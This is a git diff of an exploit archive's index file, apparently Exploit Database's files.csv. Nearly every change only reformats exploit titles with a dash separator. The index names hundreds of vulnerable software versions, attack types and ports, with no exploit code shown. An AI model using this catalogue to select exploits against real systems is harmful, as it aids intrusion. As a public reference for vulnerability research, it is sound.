diff --git a/files.csv b/files.csv index e1bd73d01..5d17e4eb3 100755 --- a/files.csv +++ b/files.csv @@ -172,7 +172,7 @@ id,file,description,date,author,platform,type,port 176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 178,platforms/linux/local/178.c,"traceroute - Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 -179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 +179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow Exploit",2000-11-15,vade79,linux,local,0 181,platforms/linux/remote/181.c,"Half Life (rcon) Remote Buffer Overflow Exploit",2000-11-16,"Sao Paulo",linux,remote,27015 182,platforms/linux/local/182.sh,"Redhat 6.2 /sbin/restore - Exploit",2000-11-16,anonymous,linux,local,0 @@ -457,7 +457,7 @@ id,file,description,date,author,platform,type,port 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 -593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0 +593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 Ftp Server - Remote DoS",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service",2004-10-26,muts,windows,dos,0 @@ -712,7 +712,7 @@ id,file,description,date,author,platform,type,port 889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer 1.3.21 - Denial of Service",2005-03-21,"Nico Spicher",windows,dos,0 -892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 +892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Mac OS X 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 @@ -744,7 +744,7 @@ id,file,description,date,author,platform,type,port 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 -925,platforms/asp/webapps/925.txt,"ACNews 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 +925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' Bluetooth Signed Buffer Index Local Root (3)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database - (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0 @@ -844,7 +844,7 @@ id,file,description,date,author,platform,type,port 1031,platforms/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection Exploit",2005-06-06,"Alberto Trivero",php,webapps,0 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 1033,platforms/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 -1034,platforms/windows/local/1034.cpp,"WinZIP 8.1 Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 +1034,platforms/windows/local/1034.cpp,"WinZIP 8.1 - Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - Login.php SQL Injection",2005-06-08,anonymous,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos,0 @@ -904,9 +904,9 @@ id,file,description,date,author,platform,type,port 1093,platforms/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service",2005-07-07,basher13,windows,dos,0 1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service",2005-07-07,Qnix,windows,dos,0 1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - XSS Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 -1096,platforms/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 +1096,platforms/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 -1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 Command Validation Exploit",2005-07-11,basher13,windows,remote,0 +1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation Exploit",2005-07-11,basher13,windows,remote,0 1100,platforms/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service",2005-07-11,basher13,windows,dos,0 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,windows,dos,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 @@ -933,7 +933,7 @@ id,file,description,date,author,platform,type,port 1126,platforms/windows/dos/1126.c,"BusinessMail Server 4.60.00 - Remote Denial of Service",2005-08-01,Kozan,windows,dos,0 1127,platforms/windows/dos/1127.cpp,"ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 -1129,platforms/windows/dos/1129.c,"Quick - 'n EasY 3.0 FTP Server Remote Denial of Service",2005-08-02,Kozan,windows,dos,0 +1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070 @@ -956,7 +956,7 @@ id,file,description,date,author,platform,type,port 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 -1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 +1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 1158,platforms/windows/dos/1158.pl,"WS_FTP Server 5.03 - (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 @@ -998,7 +998,7 @@ id,file,description,date,author,platform,type,port 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 -1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 +1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution Exploit",2005-09-07,basher13,windows,remote,0 1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 @@ -1176,7 +1176,7 @@ id,file,description,date,author,platform,type,port 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow Exploit",2006-01-07,FistFuXXer,windows,remote,80 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 -1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 +1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - (-lang) Local Buffer Overflow Exploit",2006-01-10,xwings,linux,local,0 1413,platforms/windows/remote/1413.c,"eStara Softphone 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0 @@ -1197,7 +1197,7 @@ id,file,description,date,author,platform,type,port 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS",2006-01-25,Pasv,hardware,dos,0 1448,platforms/windows/remote/1448.pl,"Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow PoC",2006-01-25,"Critical Security",windows,remote,0 -1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit",2006-01-25,"rod hedor",linux,local,0 +1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow Exploit",2006-01-25,"rod hedor",linux,local,0 1452,platforms/windows/remote/1452.pm,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2006-01-25,redsand,windows,remote,21 1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection Exploit",2006-01-25,matrix_killer,php,webapps,0 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit",2006-01-26,Argeniss,windows,local,0 @@ -1213,7 +1213,7 @@ id,file,description,date,author,platform,type,port 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (2)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 -1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 Admin Auth Details / SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 +1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection Exploit",2006-02-05,SkOd,php,webapps,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit",2006-02-06,bratax,windows,local,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 @@ -1224,7 +1224,7 @@ id,file,description,date,author,platform,type,port 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 -1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 +1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 @@ -1292,7 +1292,7 @@ id,file,description,date,author,platform,type,port 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection Exploit",2006-03-04,nukedx,asp,webapps,0 -1551,platforms/hardware/dos/1551.txt,"Multiple Routers (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 +1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 @@ -1388,7 +1388,7 @@ id,file,description,date,author,platform,type,port 1653,platforms/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,php,webapps,0 1654,platforms/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps,0 1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - (id) SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0 -1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) - Remote File Inclusion/Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 +1656,platforms/php/webapps/1656.txt,"Sire 2.0 - (lire.php) Remote File Inclusion/Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service",2006-04-09,fingerout,linux,dos,0 1659,platforms/php/webapps/1659.php,"PHPList 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 @@ -1558,7 +1558,7 @@ id,file,description,date,author,platform,type,port 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - (search.php) SQL Injection",2006-05-28,Vympel,php,webapps,0 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - (profileupdate.asp) User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 -1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 +1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - (common.php) Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - (HTTP Plugin) Remote Buffer Overflow PoC",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 @@ -1776,7 +1776,7 @@ id,file,description,date,author,platform,type,port 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 2077,platforms/php/webapps/2077.txt,"WMNews 0.2a (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 -2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component 18RC1 Include",2006-07-27,Dr.Jr7,php,webapps,0 +2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component 18RC1 - Include",2006-07-27,Dr.Jr7,php,webapps,0 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow Exploit",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 @@ -1813,7 +1813,7 @@ id,file,description,date,author,platform,type,port 2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeadmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote Inclusion",2006-08-02,beford,php,webapps,0 -2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 +2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 2118,platforms/php/webapps/2118.php,"myBloggie 2.1.4 - (trackback.php) Multiple SQL Injections Exploit",2006-08-07,rgod,php,webapps,0 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 @@ -2266,8 +2266,8 @@ id,file,description,date,author,platform,type,port 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0 2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos,0 2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 -2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 adminfoot.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 -2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 comments.php SQL Injection Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - adminfoot.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - comments.php SQL Injection Exploit",2006-10-16,w4ck1ng,php,webapps,0 2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database - (client.php) Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0 @@ -2510,8 +2510,8 @@ id,file,description,date,author,platform,type,port 2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - (common.inc.php) Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 -2832,platforms/php/webapps/2832.txt,"Messagerie Locale (centre.php) - Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 -2833,platforms/php/webapps/2833.txt,"Site News (centre.php) - Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 +2832,platforms/php/webapps/2832.txt,"Messagerie Locale - (centre.php) Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 +2833,platforms/php/webapps/2833.txt,"Site News - (centre.php) Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - SQL Injection",2006-11-23,GregStar,php,webapps,0 2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - SQL Injection",2006-11-23,GregStar,php,webapps,0 2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - (index.asp) SQL Injection",2006-11-23,ajann,php,webapps,0 @@ -2538,7 +2538,7 @@ id,file,description,date,author,platform,type,port 2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 -2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 +2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 @@ -2689,7 +2689,7 @@ id,file,description,date,author,platform,type,port 3013,platforms/windows/dos/3013.py,"Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service (0Day)",2006-12-25,h07,windows,dos,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 -3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 +3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"php-update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 @@ -2950,7 +2950,7 @@ id,file,description,date,author,platform,type,port 3279,platforms/windows/remote/3279.html,"Alibaba Alipay (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 -3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 +3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL/XSS) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion",2007-02-07,Denven,php,webapps,0 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion Exploit",2007-02-08,ajann,php,webapps,0 @@ -2968,7 +2968,7 @@ id,file,description,date,author,platform,type,port 3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion Exploit",2007-02-13,ajann,php,webapps,0 3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3299,platforms/php/webapps/3299.pl,"phpCC 4.2 beta - (nickpage.php npid) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 -3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 +3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 